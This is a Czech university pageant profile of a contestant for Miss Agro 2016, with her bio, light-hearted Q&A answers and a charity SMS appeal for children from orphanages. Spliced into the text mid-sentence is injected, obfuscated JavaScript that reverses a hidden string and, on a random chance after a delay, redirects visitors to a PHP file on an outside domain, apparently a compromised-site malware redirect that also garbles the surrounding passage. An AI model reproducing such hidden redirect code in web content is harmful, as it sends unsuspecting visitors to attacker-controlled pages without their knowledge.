Michaela Rejzková

Profil

Fakulta: Provozně ekonomická fakulta (PEF)
Obor: Hospodářská a kulturní a studia (HKS)
Věk: 22 let
Ročník: 2.

Míša je ukřičená zrzka, co hraje na bubny a miluje matematiku. Cvičí 17 let aerobik a stále neudělá provaz. Přihlásila se na Miss Agro, protože jedna z cen bylo prasátko a ona ho strašně chce.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ h4=“Pošlete DMS a zařaďte se do slosování o ceny“ css=“.vc_custom_1516548751790{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím organizace Nadání a dovednosti o.p.s. Podpořte je i Vy! Pošlete dárcovskou SMS ve tvaru DMS ROZHLED na číslo 87 777. Cena DMS je 30 Kč. Více na www.darcovskasms.cz. Zasláním DMS do 10. 5. 2016 můžete navíc za Vaši podporu získat odměnu.

Proč by ses zrovna Ty měla stát Miss Agro 2016?
Co tak vím, tak se v soutěži moc zrzek neobjevilo. Zrzky jsou většinou živelné a pro každou legraci a já přesně taková jsem. Živel, pro vše špatné a vše, kde se určite zasměju. Jsem prostě zrzka.

Kdyby ses mohla narodit ještě jednou, kdo bys byla?
Můj pes. Jen spí, hraje si, mazlí se a má každodenní přísun jidla a pití. Většina lidí by o mě mluvila hezky, pokud bych někomu zrovna nezalehla místo a pak dělala, že neslyším.

Na který předmět na ČZU vzpomínáš nejvíce a proč?
Rozhodne na předměty, které mi daly zabrat při zkouškách. Momentálně mé napadá geografie náboženství, kdy jsem při přednášce ve chvíli, kdy vešel doc. Kokaisl, který přednášel, vyhodila pojistky, když jsem si nabíjela battery safer. Nenápadně jsem vybouchlou nabíječku uklidila a modlila se, že nikdo nepozná, že za to mužů já. V půlce hodiny to naštěstí nahodili. Od té doby, si ve škole nic nenabíjím.